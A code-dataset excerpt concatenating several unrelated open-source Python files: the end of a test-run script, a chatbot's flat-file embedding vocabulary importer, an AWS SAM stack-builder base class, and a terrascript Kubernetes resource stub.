framework.target_cases = cases_list
framework.start_run()
print "\n\n------------------------------------------------------------"
print "The run folder is [" + framework.running_folder +"]"
print "that's all. bye"
print "kill to quit.."
t_kill_process_by_name("start.py")
sys.exit(0)
os._exit()
|
seq2seq-chatbot/vocabulary_importers/flatfile_vocabulary_importer.py | rohitkujur1997/chatbot | 104 | 11179921 | """
Base class for Flat File vocabulary importers
"""
import numpy as np
from collections import OrderedDict
from os import path
from vocabulary_importers.vocabulary_importer import VocabularyImporter
class FlatFileVocabularyImporter(VocabularyImporter):
"""Base class for Flat File vocabulary importers
"""
def __init__(self, vocabulary_name, tokens_and_embeddings_filename, delimiter):
super(FlatFileVocabularyImporter, self).__init__(vocabulary_name)
"""Initialize the FlatFileVocabularyImporter.
Args:
vocabulary_name: See base class
tokens_and_embeddings_filename: Name of the file containing the token/word list and embeddings.
Format should be one line per word where the word is at the beginning of the line and the embedding vector follows
seperated by a delimiter.
delimiter: Character that separates the word and the values of the embedding vector.
"""
self.tokens_and_embeddings_filename = tokens_and_embeddings_filename
self.delimiter = delimiter
def _read_vocabulary_and_embeddings(self, vocabulary_dir):
"""Read the raw vocabulary file(s) and return the tokens list with corresponding word vectors
Args:
vocabulary_dir: See base class
"""
tokens_and_embeddings_filepath = path.join(vocabulary_dir, self.tokens_and_embeddings_filename)
tokens_with_embeddings = OrderedDict()
with open(tokens_and_embeddings_filepath, encoding="utf-8") as file:
for _, line in enumerate(file):
values = line.split(self.delimiter)
token = values[0].strip()
if token != "":
token = self._process_token(token)
tokens_with_embeddings[token] = np.array(values[1:], dtype=np.float32)
return tokens_with_embeddings |
samcli/lib/bootstrap/stack_builder.py | aubelsb2/aws-sam-cli | 2,959 | 11179931 | <filename>samcli/lib/bootstrap/stack_builder.py<gh_stars>1000+
"""
Abstract definitions for stack builder
"""
import json
from abc import ABC
from copy import deepcopy
from typing import Dict, Union, cast
from samcli import __version__ as VERSION
METADATA_FIELD = "Metadata"
RESOURCES_FIELD = "Resources"
OUTPUTS_FIELD = "Outputs"
DEFAULT_TEMPLATE_BEGINNER = {
"AWSTemplateFormatVersion": "2010-09-09",
"Transform": "AWS::Serverless-2016-10-31",
METADATA_FIELD: {"SamCliInfo": VERSION},
RESOURCES_FIELD: {},
OUTPUTS_FIELD: {},
}
class AbstractStackBuilder(ABC):
"""
AbstractStackBuilder implementation which holds common methods for adding resources/properties
and generating SAM template
"""
_template_dict: Dict
def __init__(self, description: str):
self._template_dict = deepcopy(DEFAULT_TEMPLATE_BEGINNER)
self._template_dict["Description"] = description
def add_metadata(self, key: str, value: Union[str, Dict]) -> None:
if METADATA_FIELD not in self._template_dict:
self._template_dict[METADATA_FIELD] = {}
metadata = cast(Dict, self._template_dict.get(METADATA_FIELD))
metadata["key"] = value
def add_resource(self, resource_name: str, resource_dict: Dict) -> None:
if RESOURCES_FIELD not in self._template_dict:
self._template_dict[RESOURCES_FIELD] = {}
resources = cast(Dict, self._template_dict.get(RESOURCES_FIELD))
resources[resource_name] = resource_dict
def add_output(self, output_name: str, output_value: Union[Dict, str]) -> None:
if OUTPUTS_FIELD not in self._template_dict:
self._template_dict[OUTPUTS_FIELD] = {}
outputs = cast(Dict, self._template_dict.get(OUTPUTS_FIELD))
outputs[output_name] = {"Value": output_value}
def build_as_dict(self) -> Dict:
return deepcopy(self._template_dict)
def build(self) -> str:
return json.dumps(self._template_dict, indent=2)
|
terrascript/resource/hashicorp/kubernetes_alpha.py | mjuenema/python-terrascript | 507 | 11179943 | # terrascript/resource/hashicorp/kubernetes_alpha.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:48 UTC)
import terrascript
class kubernetes_manifest(terrascript.Resource):
pass
__all__ = [
"kubernetes_manifest",
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.